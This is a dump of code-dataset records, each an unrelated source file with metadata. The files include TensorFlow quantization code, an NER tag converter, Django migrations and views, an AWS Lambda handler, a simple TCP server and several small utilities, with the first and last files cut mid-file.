tf.control_dependencies([init_moving_scale_op]):\n weight_scales_reshape = tf.reshape(weight_scales, bias_tensor.shape)\n bias_scale = input_scale * weight_scales_reshape\n bias_scale = bias_scale + tf.cast(tf.less(tf.abs(bias_scale), 1e-6), tf.float32) * self._eps\n before_round = tf.divide(bias_tensor, bias_scale, name=_MNN_mark_start_name)\n before_round = before_round + 1e-3 * tf.sign(before_round)\n quant_bias = tf.round(before_round)\n new_bias = quant_bias * bias_scale\n new_bias_tensor = tf.cond(tf.constant(True), lambda: new_bias, lambda: bias_tensor, name=_MNN_mark_end_name)\n \n return new_bias_tensor\n\n def _fake_quant_weight(self, weight_tensor, reduce_dims, scope, clamp_value=None):\n if clamp_value is None:\n clamp_value = self._clamp_value\n\n with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n with self._graph.gradient_override_map({'Round': 'Identity'}):\n scales = tf.reduce_max(tf.abs(weight_tensor, name=_MNN_mark_start_name), axis=reduce_dims, keep_dims=True) / clamp_value + self._eps\n weight_scales = tf.get_variable(name='weight_scales', initializer=tf.zeros_like(scales), trainable=False)\n tf.add_to_collection(_MNN_variable_collection_name, weight_scales)\n scales_assign = tf.assign(weight_scales, scales)\n with tf.control_dependencies([scales_assign]):\n quant_w = tf.clip_by_value(tf.round(weight_tensor / scales), -clamp_value, clamp_value)\n fake_quant_w = quant_w * scales\n\n if _MNN_QAT_DEBUG:\n print_op = tf.print(scope, \"weight clamp value:\", clamp_value)\n with tf.control_dependencies([print_op]):\n new_weight_tensor = tf.cond(tf.constant(True), lambda: fake_quant_w, lambda: weight_tensor, name=_MNN_mark_end_name)\n else:\n new_weight_tensor = tf.cond(tf.constant(True), lambda: fake_quant_w, lambda: weight_tensor, name=_MNN_mark_end_name)\n\n self._weight_scale_original_tensor_map[weight_scales] = weight_tensor\n\n return new_weight_tensor, weight_scales\n\n def _fake_quant_feature(self, feature, scope, op, type, clamp_value=None):\n if clamp_value is None:\n clamp_value = self._clamp_value\n \n with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n with self._graph.gradient_override_map({'Round': 'Identity'}):\n feature_abs_max = tf.reduce_max(tf.abs(feature, name=_MNN_mark_start_name))\n if _MNN_QAT_DEBUG:\n print_op = tf.print(\"op:\", op.name, type, \"feature_abs_max, clamp_value:\", feature_abs_max, clamp_value)\n with tf.control_dependencies([print_op]):\n instance_scale = feature_abs_max / clamp_value\n else:\n instance_scale = feature_abs_max / clamp_value\n moving_average_scale = tf.get_variable(name='moving_average_scale', initializer=0., trainable=False)\n tf.add_to_collection(_MNN_variable_collection_name, moving_average_scale)\n\n def init():\n init_assign = tf.assign(moving_average_scale, instance_scale)\n initialize_op = tf.assign(self._op_scale_initialized[op][type], 1)\n if _MNN_QAT_DEBUG:\n print_op = tf.print(\"init\", moving_average_scale.name, init_assign)\n with tf.control_dependencies([print_op, initialize_op]):\n return tf.identity(init_assign)\n else:\n with tf.control_dependencies([initialize_op]):\n return tf.identity(init_assign)\n\n def do_nothing():\n return moving_average_scale\n\n init_moving_scale = tf.cond(tf.equal(self._op_scale_initialized[op][type], 0), init, do_nothing)\n self._feature_scale_init_op[moving_average_scale] = init_moving_scale\n\n def fake_quant():\n def moving_average_scale_update():\n if _MNN_QAT_DEBUG:\n with tf.control_dependencies([init_moving_scale]):\n assign_scale = tf.assign(moving_average_scale, moving_average_scale * self._momentum + instance_scale * (1 - self._momentum))\n with tf.control_dependencies([assign_scale]):\n print_op = tf.print(\"train:\", scope + \"_scale:\", instance_scale, moving_average_scale)\n with tf.control_dependencies([assign_scale, print_op]):\n return tf.identity(instance_scale)\n else:\n with tf.control_dependencies([init_moving_scale]):\n assign_scale = tf.assign(moving_average_scale, moving_average_scale * self._momentum + instance_scale * (1 - self._momentum))\n with tf.control_dependencies([assign_scale]):\n return tf.identity(instance_scale)\n\n def return_average_scale():\n if _MNN_QAT_DEBUG:\n print_op = tf.print(\"test:\", moving_average_scale.name, moving_average_scale)\n with tf.control_dependencies([print_op]):\n return tf.identity(moving_average_scale)\n else:\n return tf.identity(moving_average_scale)\n\n scale = tf.cond(self._is_training, moving_average_scale_update, return_average_scale)\n quant_x = tf.clip_by_value(tf.round(feature / scale), -clamp_value, clamp_value)\n fake_quant_x = quant_x * scale\n \n return fake_quant_x\n\n new_feature = tf.cond(tf.constant(True), fake_quant, lambda:feature, name=_MNN_mark_end_name)\n \n self._feature_scale_original_tensor_dims_map[moving_average_scale] = [feature, feature.shape.as_list()[-1]]\n \n return new_feature, moving_average_scale, feature.shape.as_list()[-1], init_moving_scale\n","sub_path":"tools/mnncompress/mnncompress/tensorflow/EMA_quantizer.py","file_name":"EMA_quantizer.py","file_ext":"py","file_size_in_byte":35947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"600903685","text":"import numpy as np\nimport glob\nimport os\n\n\nbilou = 'BILOU'\n\n\n# class Token:\n# # tag = 'O'\n# id = 0\n# tag = bilou.find('O')\n# cls = '_'\n# content = ''\n# position = 0\n#\n# def __str__(self):\n# return '<' + str(self.id) + ' ' + self.tag + ' ' + self.cls + ' ' + self.content + ' position:' + str(self.position) + '>'\n\n\nclass Span:\n tokens = []\n cls = '_'\n tag = 'O'\n\n def __str__(self):\n return '<' + str(self.id) + ' ' + self.cls + ' ' + str(self.tokens) + ' ' + self.tag + '>'\n\n\nclass Object:\n spans = []\n\n def __str__(self):\n return '<' + str(self.id) + ' ' + self.cls + ' ' + str(self.spans) + '>'\n\n\ndef read_tokens(file):\n sentence = []\n tokens = []\n file = open(file + '.tokens', 'r')\n for token in file:\n # print(token.strip())\n if token.strip() != '':\n params = token.strip().split(\" \")\n # t = Token()\n # t.id = int(params[0])\n # t.content = params[3]\n t = {\n 'cls': '_',\n 'tag': bilou.find('O'),\n 'id': int(params[0]),\n 'content': params[3],\n 'position': 0\n }\n tokens.append(t)\n\n else:\n sentence.append(tokens)\n tokens = []\n return sentence\n\n\ndef read_spans(file):\n spans = []\n file = open(file + '.spans', 'r')\n for span in file:\n params = span.strip().split(\" \")\n spn = Span()\n spn.id = int(params[0])\n spn.tokens = []\n count = int(params[5])\n for i in range(0, count):\n spn.tokens.append(int(params[8 + i]))\n spans.append(spn)\n return spans\n\n\ndef read_objects(file):\n objects = []\n file = open(file + '.objects', 'r')\n for obj in file:\n params = obj.strip().split(\" \")\n object = Object()\n object.id = int(params[0])\n object.cls = params[1]\n object.spans = []\n i = 2\n while params[i] != '#':\n object.spans.append(int(params[i]))\n i += 1\n objects.append(object)\n return objects\n\n\ndef set_params_on_spans(span, objs):\n for obj in objs:\n if span.id in obj.spans:\n span.cls = obj.cls\n if len(obj.spans) == 1:\n span.tag = 'U'\n elif len(obj.spans) > 1:\n if obj.spans[0] == span.id:\n span.tag = 'B'\n elif obj.spans[-1] == span.id:\n span.tag = 'L'\n else:\n span.tag = 'I'\n\n\ndef set_params_on_tokens(token, spans):\n tag = 'O'\n for span in spans:\n if token['id'] in span.tokens and span.cls != '_' and token['tag'] == bilou.find('O'):\n token['cls'] = span.cls\n if span.tag == 'B':\n if token['id'] == span.tokens[0]:\n tag = 'B'\n else:\n tag = 'I'\n elif span.tag == 'I':\n tag = 'I'\n elif span.tag == 'L':\n if token['id'] == span.tokens[-1]:\n tag = 'L'\n else:\n tag = 'I'\n elif span.tag == 'U':\n if len(span.tokens) > 1:\n if token['id'] == span.tokens[0]:\n tag = 'B'\n elif token['id'] == span.tokens[-1]:\n tag = 'L'\n else:\n tag = 'I'\n elif len(span.tokens) == 1:\n tag = 'U'\n token['tag'] = bilou.find(tag)\n # token.tag = tag\n\n\ndef convert_test_dataset(files):\n text = []\n sent_vector = []\n # os.chdir(dir)\n # files = os.listdir()\n dict_files = list(map(lambda t: os.path.splitext(t)[0], (list(filter(lambda x: x.endswith('.txt'), files)))))\n # print(len(dict_files))\n for name in dict_files:\n sentences = read_tokens(name)\n spans = read_spans(name)\n objects = read_objects(name)\n for spn in spans:\n set_params_on_spans(spn, objects)\n # print(len(sentences))\n\n for sent in sentences:\n for index, tkn in enumerate(sent):\n set_params_on_tokens(tkn, spans)\n tkn['position'] = index\n text.append(sent)\n return text\n\n","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":4335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"102925896","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('flatpages', '0002_auto_20150923_1801'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='acting',\n options={'ordering': ('order',), 'get_latest_by': 'created_at', 'verbose_name': 'Atua\\xe7\\xe3o', 'verbose_name_plural': 'Atua\\xe7\\xf5es'},\n ),\n migrations.AlterModelOptions(\n name='institutional',\n options={'ordering': ('order',), 'get_latest_by': 'created_at', 'verbose_name': 'Institucional', 'verbose_name_plural': 'Institucionais'},\n ),\n migrations.AddField(\n model_name='acting',\n name='order',\n field=models.PositiveIntegerField(default=0),\n ),\n migrations.AddField(\n model_name='institutional',\n name='order',\n field=models.PositiveIntegerField(default=0),\n ),\n ]\n","sub_path":"apps/flatpages/migrations/0003_auto_20151015_2016.py","file_name":"0003_auto_20151015_2016.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"560275185","text":"from sklearn import svm\nimport numpy as np\nfrom sklearn import datasets\nimport matplotlib.pylab as plt\n\nboston = datasets.load_boston()\nX_train = boston.data[0:30]\n# print(X_train)\n\ny_train = boston.target[0:30]\n# print( y_train)\n\ny_train_binary = []\n\nfor price in y_train:\n y_train_binary.append(price >= 20)\n\n# plt.plot(X_train, y_train_binary)\n# plt.show()\n\nX_test = boston.data[28]\ny_test = boston.target[28]\n\nprint(y_test)\n\nclf = svm.SVC()\nclf.fit(X_train, y_train_binary)\n\nprint(clf.predict([X_test]))\n\n# # get support vectors\n# print(clf.support_vectors_)\n#\n#\n# # get indices of support vectors\n# print(clf.support_)\n#\n# # get number of support vectors for each class\nprint(clf.n_support_)\n","sub_path":"svm_linear.py","file_name":"svm_linear.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"334912010","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Magnet',\n fields=[\n ('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')),\n ('description', models.TextField()),\n ('image_url', models.URLField()),\n ('content', models.TextField()),\n ('status', models.CharField(max_length=8, default='Normal')),\n ('created_datetime', models.DateTimeField(auto_now_add=True)),\n ('updated_datetime', models.DateTimeField(auto_now=True)),\n ('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ['-created_datetime'],\n 'get_latest_by': 'created_datetime',\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"magnet/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"147250910","text":"import json\nimport boto3\nfrom datetime import date\ndynamodb = boto3.resource('dynamodb')\ntable = dynamodb.Table('ismaeelDB')\n\n################################### Methods ########################################\n########### Methhod (1)to Check is the given regno is already exist or not ###############\ndef check_if_item_exist(item):\n response = table.get_item(\n Key={\n 'regno': item\n }\n )\n return True if ('Item' in response) else False\n \n \n############################################## Method to check the validation of input ################\ndef validatesInput(firstname,lastname,section,errors,resp):\n \n if (firstname==None or not firstname):\n resp[\"message\"]='Requested Inputs are not completes' \n errors.append(\"errormessage : firstname not valid/Firstname is empty\")\n\n \n if (lastname==None or not lastname):\n resp[\"message\"]='Requested Inputs are not completes' \n errors.append(\"errormessage :lastname not valid/lastname is empty\")\n \n if (section!=None and not section):\n resp[\"message\"]='Requested Inputs are not completes' \n errors.append(\"errormessage : sectoin not valid/sectoin is empty\")\n return True if (not errors ) else False \n\n################################################ main lambda function ##########################################\ndef lambda_handler(event, context):\n errors=[]\n resp={\n \"success\":False ,\n \"StatusCode\":400 ,\n \"message\":\"\"\n }\n if not event:\n resp[\"message\"]=' invalid input request'\n errors.append( 'errormessage : No events Found ') \n elif not event.get('regno'):\n resp[\"message\"]=' invalid input request'\n errors.append( 'errormessage : No registration events Found ') \n else: \n IndexOfRegno=list(event.keys()).index(\"regno\")\n event.update({list(event.keys())[IndexOfRegno]:list(event.values())[IndexOfRegno].upper()})\n regno = event.get('regno', None)\n firstname = event.get('firstname', None)\n lastname = event.get('lastname', None)\n section = event.get('section', None)\n \n # if (regno==None or not regno) :\n # resp[\"message\"]=' Registration Number is Primary Key must be Entered First'\n # errors.append( 'errormessage : Invalid registration number ')\n # errors.append( 'errormessage : Registration Number is not Entered ')\n \n if(check_if_item_exist(str(regno.upper())) ):\n # if (check_if_item_exist(str(regno.lower())) )\n resp[\"message\"]='Duplication of data may occur try with another registration number '\n errors.append('errormessage : Data is already uploaded for ' + regno)\n \n \n \n \n elif(validatesInput(firstname,lastname,section,errors,resp)):\n response = table.put_item(Item=event)\n resp[\"success\"]=True\n resp[\"StatusCode\"]=200\n resp[\"message\"]='Date stored Successfully ' \n # resp[\"errors\"]=None\n \n \n \n \n \n \n if not errors:\n resp[\"errors\"]=None\n else:\n resp[\"errors\"]=errors\n return resp ","sub_path":"lambda_apigateway_dynamoDBC1/modules/lambdas/lambda_functions/ismaeelCreatedFunctionp.py","file_name":"ismaeelCreatedFunctionp.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"282605712","text":"def getpicname(cropname):\r\n ip = cropname.split('_')[0]\r\n day = cropname.split('_')[1]\r\n return ip + '_' +day + '.jpg'\r\n\r\n\r\n\r\ndef getalertcount(txtpath, detthresh, classthresh, labels):\r\n repeat = []\r\n with open(txtpath, 'r') as f:\r\n lines = f.readlines()\r\n total = len(lines)\r\n count = 0\r\n for line in lines:\r\n line = line.strip()\r\n factors = line.split(',')\r\n name = factors[0]\r\n detscore = float(name.split('_')[-1][:-4])\r\n classscore = float(factors[-2])\r\n label = int(factors[-1])\r\n if label in labels:\r\n if detscore > detthresh:\r\n if classscore > classthresh:\r\n picname = getpicname(name)\r\n if picname not in repeat:\r\n repeat.append(picname)\r\n count += 1\r\n return count, count/total, len(repeat), len(repeat)/11666\r\n\r\n\r\nif __name__ == '__main__':\r\n txtpath = '/defaultShare/share/wujl/83/online_data/2020-07-30_20_19.txt'\r\n labelboxes = [[2,3,5,6,7,10,14]]\r\n detthreshs = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]\r\n classthreshs = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]\r\n for labels in labelboxes:\r\n for detthresh in detthreshs:\r\n for classthresh in classthreshs:\r\n count, rate, piccount, picrate = getalertcount(txtpath, detthresh, classthresh, labels)\r\n print('{}'.format(labels))\r\n print('det{}_c{} is : {}, {}, {}, {}'.format(detthresh, classthresh, count, rate, piccount, picrate))\r\n print('*'*10)\r\n\r\n","sub_path":"test/staticalert.py","file_name":"staticalert.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"221929982","text":"# coding=utf-8\nimport pymongo\nfrom configure.ConfigureUtils import *\nimport configure.constans as ct\n\n\nclass MongoUtils(object):\n\n def __init__(self):\n configure_utils = get_configure_utils()\n mongo_host = configure_utils.get(ct.new_mongo_host)\n mongo_port = configure_utils.getint(ct.new_mongo_port)\n self.new_mongodb = pymongo.MongoClient(mongo_host, mongo_port)\n mongo_db_str = configure_utils.get(ct.mongo_db)\n self.db = self.new_mongodb[mongo_db_str]\n self.hx_moment_sources = self.db.hx_moment_sources\n self.hx_moment_spider_filter = self.db.hx_moment_spider_filter\n self.hx_moment_notype = self.db.hx_moment_notype\n self.hx_moment_record = self.db.hx_moment_record\n\n\nif __name__ == '__main__':\n configure_utils = init_configure_utils(\"test\")\n mongo_utils = MongoUtils()\n one = mongo_utils.hx_moment_notype.find_one({'_id': \"ef76c5b22104798ea70c9198f935871b\"})\n print(one)\n","sub_path":"predict_user_attribute/old/gender/utils/mongo/MongoUtils.py","file_name":"MongoUtils.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"627340674","text":"\"\"\"\nService class\n------------------\nService object for interfacing with the Pipelines service API\n\n\"\"\"\n\nimport logging\n\nfrom ...client import Client\nfrom ...services import BaseService\n\nRUNNING_STATUSES = [\"QUEUED\", \"LAUNCHING\", \"INITIALIZING\", \"RUNNING\"]\nFAILED_STATUSES = [\"FAILED\", \"TERMINATED\"]\nFINISHED_STATUSES = [\"FINISHED\", \"CANCELLED\"]\nALL_STATUSES = RUNNING_STATUSES + FAILED_STATUSES + FINISHED_STATUSES + [\"ALL\"]\n\nSERVICE_PATH = \"pipelines-service\"\n\nlog = logging.getLogger(__file__)\n\n\nclass Service(BaseService):\n def __init__(self, client: Client, *args, **kwargs) -> None:\n super(Service, self).__init__(client, SERVICE_PATH, *args, **kwargs)\n","sub_path":"nextcode/services/pipelines/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"241498311","text":"class CmdSetStats(default_cmds.MuxCommand):\n \"\"\"\n \n \"\"\"\n \n key = \"setstats\"\n locks = \"cmd:all()\"\n \n def func(self):\n caller = self.caller\n rolls = 25\n msg1 = \"Runaria uses a method of rolling the dice to create player attributes. These attributes are: strength, dexterity, constitution, intelligence, wisdom, and charisma. Choose the order of your attributes from the most important to your character to the least important.\\n\\nAn example is as follows: strength dexterity constitution intelligence wisdom charisma\\n\\nYou will only be able to roll 25 times, so when you see a decent roll you should accept it.\"\n if self.caller.db.stat_rolled: \n return self.caller.msg('You may only roll your stats once.')\n elif not self.caller.db.stat_rolled:\n self.caller.msg(msg1)\n statorder = input('Enter your attribute order:')\n stats_in_order = statorder.strip().split()","sub_path":"commands/setstats.py","file_name":"setstats.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"324787593","text":"# Configuration file to make YouCompleteMe (http://valloric.github.io/YouCompleteMe/)\n# for Vim behave for development on the `selene` library. Use at your own risk.\n# Modeled after https://github.com/Valloric/ycmd/blob/master/cpp/ycm/.ycm_extra_conf.py.\n\nimport os\nimport ycm_core\n\n\nHEADER_EXTENSIONS = ['.h', '.hpp']\nSOURCE_EXTENSIONS = ['.c', '.cpp']\nBUILD_DIRECTORY = \"build\" # Change if build happens in another directory\n\n# These are the compilation flags that will be used in case there is no compilation database set\ndefault_flags = [\n '-x', 'c++',\n '-std=c++14',\n '-Wall', '-Wextra', '-Werror',\n '-fexceptions',\n '-I', '/usr/include',\n '-I', '/usr/local/include',\n '-I', os.path.expanduser('~') + '/homebrew/include/',\n '-I', os.path.expanduser('~') + '/homebrew/opt/jpeg-turbo/include',\n '-I', './src',\n '-I', './external/Catch2/single_include',\n '-D', 'SELENE_WITH_LIBJPEG',\n '-D', 'SELENE_WITH_LIBPNG',\n '-D', 'SELENE_WITH_OPENCV',\n]\n\n\ndef directory_of_this_script():\n return os.path.dirname(os.path.abspath(__file__))\n\n\n# Set this to the absolute path to the folder (NOT the file!) containing the\n# compile_commands.json file to use that instead of 'flags'. See here for more\n# details: http://clang.llvm.org/docs/JSONCompilationDatabase.html\ncompilation_database_folder = os.path.join(directory_of_this_script(), BUILD_DIRECTORY)\ncompilation_database_path = os.path.join(compilation_database_folder, \"compile_commands.json\")\n\nif os.path.exists(compilation_database_path):\n database = ycm_core.CompilationDatabase(compilation_database_folder)\nelse:\n database = None\n\n\ndef make_flags_paths_absolute(flags, working_directory):\n if not working_directory:\n return list(flags)\n\n new_flags = []\n make_next_absolute = False\n path_flags = ['-isystem', '-I', '-iquote', '--sysroot=']\n for flag in flags:\n new_flag = flag\n\n if make_next_absolute:\n make_next_absolute = False\n if not flag.startswith('/'):\n new_flag = os.path.join(working_directory, flag)\n\n for path_flag in path_flags:\n if flag == path_flag:\n make_next_absolute = True\n break\n\n if flag.startswith(path_flag):\n path = flag[len(path_flag):]\n new_flag = path_flag + os.path.join(working_directory, path)\n break\n\n new_flags.append(new_flag)\n return new_flags\n\n\ndef is_header_file(filename):\n extension = os.path.splitext(filename)[1]\n return extension in HEADER_EXTENSIONS\n\n\ndef get_compilation_info_for_file(filename):\n # The compilation_commands.json file generated by CMake does not have\n # entries for header files. So we do our best by asking the db for flags\n # for a corresponding source file, if any. If one exists, the flags for\n # that file should be good enough.\n if is_header_file(filename):\n basename = os.path.splitext(filename)[0]\n for extension in SOURCE_EXTENSIONS:\n replacement_file = basename + extension\n if os.path.exists(replacement_file):\n compilation_info = database.GetCompilationInfoForFile(replacement_file)\n return compilation_info\n return None\n return database.GetCompilationInfoForFile(filename)\n\n\ndef FlagsForFile(filename, **kwargs):\n if database:\n # Bear in mind that compilation_info.compiler_flags_ does NOT return\n # a python list, but a \"list-like\" StringVec object\n compilation_info = get_compilation_info_for_file(filename)\n if compilation_info:\n flags = make_flags_paths_absolute(compilation_info.compiler_flags_,\n compilation_info.compiler_working_dir_)\n return {'flags': flags}\n\n relative_to = directory_of_this_script()\n flags = make_flags_paths_absolute(default_flags, relative_to)\n return {'flags': flags}\n","sub_path":".ycm_extra_conf.py","file_name":".ycm_extra_conf.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"335213915","text":"from sys import stdin\nfrom collections import deque\nn = int(input())\nd = [-1] * (n + 1)\ndef bfs():\n d[1] = 0\n dq = deque([1])\n while len(dq) != 0:\n v = dq.popleft()\n for c in G[v]:\n if d[c] != -1 : continue\n d[c] = d[v] + 1\n dq.append(c)\n for i, x in enumerate(d[1:], start=1):\n print(i, x)\nG = [0] + [list(map(int, input().split()[2:])) for i in range(n)]\nbfs()","sub_path":"Python_codes/p02239/s215469299.py","file_name":"s215469299.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"95390558","text":"#!/usr/bin/python3\r\n\r\nimport socket\r\n\r\n#Creating the socket object\r\nserversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\nhost = socket.gethostname() # Host is server IP\r\nport = 444 # The TCP port number this server is bound to\r\n\r\n#Binding to socket\r\nserversocket.bind((host, port)) #Host will be replaced/substitued with IP, if changed and not running on host\r\n\r\n#listen for incoming connection\r\nserversocket.listen(3)\r\n\r\n#Infinite loop, each iteration handles a connection from a client\r\nwhile True:\r\n #Accept the connection \r\n clientsocket,address = serversocket.accept()\r\n\r\n print(\"received connection from \" % str(address))\r\n \r\n #Message sent to client after successful connection\r\n message = 'hello! Thank you for connecting to the server' + \"\\r\\n\"\r\n \r\n clientsocket.send(message)\r\n\r\n clientsocket.close()\r\n","sub_path":"TCP Server.py","file_name":"TCP Server.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"434585627","text":"from django.db.models.fields.json import DataContains\nfrom django.shortcuts import render, redirect\nfrom .models import Author, Book\nfrom .forms import *\n# Create your views here.\n\n\ndef books(request):\n books = Book.objects.order_by('title')\n data = {\"books\": books}\n return render(request, \"books/books.html\", data)\n\n\ndef authors(request):\n authors = Author.objects.order_by('first_name')\n data = {\"authors\": authors}\n return render(request, \"books/authors.html\", data)\n\n\ndef add_books(request):\n form = BooksForm()\n if request.method == 'POST':\n form = BooksForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('/')\n\n data = {\"form\": form}\n return render(request, \"books/add_books.html\", data)\n\n\ndef add_authors(request):\n form = AuthorsForm()\n if request.method == 'POST':\n form = AuthorsForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('/authors')\n\n data = {\"form\": form}\n return render(request, \"books/add_authors.html\", data)\n\n\ndef update_books(request, pk):\n book = Book.objects.get(id=pk)\n form = BooksForm(instance=book)\n\n if request.method == \"POST\":\n form = BooksForm(request.POST, instance=book)\n if form.is_valid():\n form.save()\n return redirect('/')\n\n data = {\"book\": book, \"form\": form}\n return render(request, 'books/update_books.html', data)\n\n\ndef update_authors(request, pk):\n author = Author.objects.get(id=pk)\n form = AuthorsForm(instance=author)\n\n if request.method == \"POST\":\n form = AuthorsForm(request.POST, instance=author)\n if form.is_valid():\n form.save()\n return redirect('/')\n\n data = {\"author\": author, \"form\": form}\n return render(request, 'books/update_authors.html', data)\n\n\ndef delete_books(request, pk):\n book = Book.objects.get(id=pk)\n book.delete()\n return redirect('/')\n\n\ndef delete_authors(request, pk):\n author = Author.objects.get(id=pk)\n author.delete()\n return redirect('/authors')\n","sub_path":"books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"202549141","text":"##########################################################################\n# \n# Copyright (c) 2014, Image Engine Design Inc. All rights reserved.\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n# \n# * Redistributions of source code must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer.\n# \n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided with\n# the distribution.\n# \n# * Neither the name of John Haddon nor the names of\n# any other contributors to this software may be used to endorse or\n# promote products derived from this software without specific prior\n# written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS\n# IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n# \n##########################################################################\n\nimport IECore\nimport Gaffer\n\nclass TextWriter( Gaffer.ExecutableNode ) :\n\t\n\tdef __init__( self, name=\"TextWriter\" ) :\n\t\t\n\t\tGaffer.ExecutableNode.__init__( self, name )\n\t\t\n\t\tself.addChild( Gaffer.StringPlug( \"fileName\", Gaffer.Plug.Direction.In ) )\n\t\tself.addChild( Gaffer.StringPlug( \"text\", Gaffer.Plug.Direction.In ) )\n\t\n\tdef execute( self, contexts ):\n\t\t\n\t\tfor context in contexts :\n\t\t\t\n\t\t\twith context :\n\t\t\t\tfileName = context.substitute( self[\"fileName\"].getValue() )\n\t\t\t\ttext = context.substitute( self[\"text\"].getValue() )\n\t\t\t\n\t\t\treplace = context.get( \"textWriter:replace\", IECore.StringVectorData() )\n\t\t\tif replace and len(replace) == 2 :\n\t\t\t\ttext = text.replace( replace[0], replace[1] )\n\t\t\t\n\t\t\twith file( fileName, \"w\" ) as f :\n\t\t\t\tf.write( text )\n\t\n\tdef executionHash( self, context ) :\n\t\t\n\t\th = Gaffer.ExecutableNode.executionHash( self, context )\n\t\th.append( context.getFrame() )\n\t\th.append( context.get( \"textWriter:replace\", IECore.StringVectorData() ) )\n\t\th.append( context.substitute( self[\"fileName\"].getValue() ) )\n\t\th.append( context.substitute( self[\"text\"].getValue() ) )\n\t\t\n\t\treturn h\n\nIECore.registerRunTimeTyped( TextWriter, typeName = \"GafferTest::TextWriter\" )\n","sub_path":"python/GafferTest/TextWriter.py","file_name":"TextWriter.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"150936721","text":"import matplotlib.pyplot as plt\nfrom matplotlib import pyplot as mp\n\ndef show_image(img, title = \"\", cmap='gray', file = 'empty'):\n plt.title(title)\n plt.imshow(img, cmap)\n if file not in ['empty']:\n mp.savefig('output_images/' + file + '.jpg', type=\"jpg\", bbox_inches='tight')\n \ndef show_images(images, columns = 2, colormap='gray', name = 'empty'):\n fig = plt.figure(figsize=(20,10))\n for i, image in enumerate(images):\n subfig = fig.add_subplot(len(images) / columns + 1, columns, i + 1)\n subfig.imshow(image)\n #if name not in ['empty']:\n # mp.savefig('test_images_output/' + name + '.png', type=\"png\", bbox_inches='tight')\n\ndef show_images_side_by_side(image1, image2, title1 =\"\", title2 = \"\", cmap='gray', file = 'empty'):\n fig = plt.figure(figsize=(20,10))\n 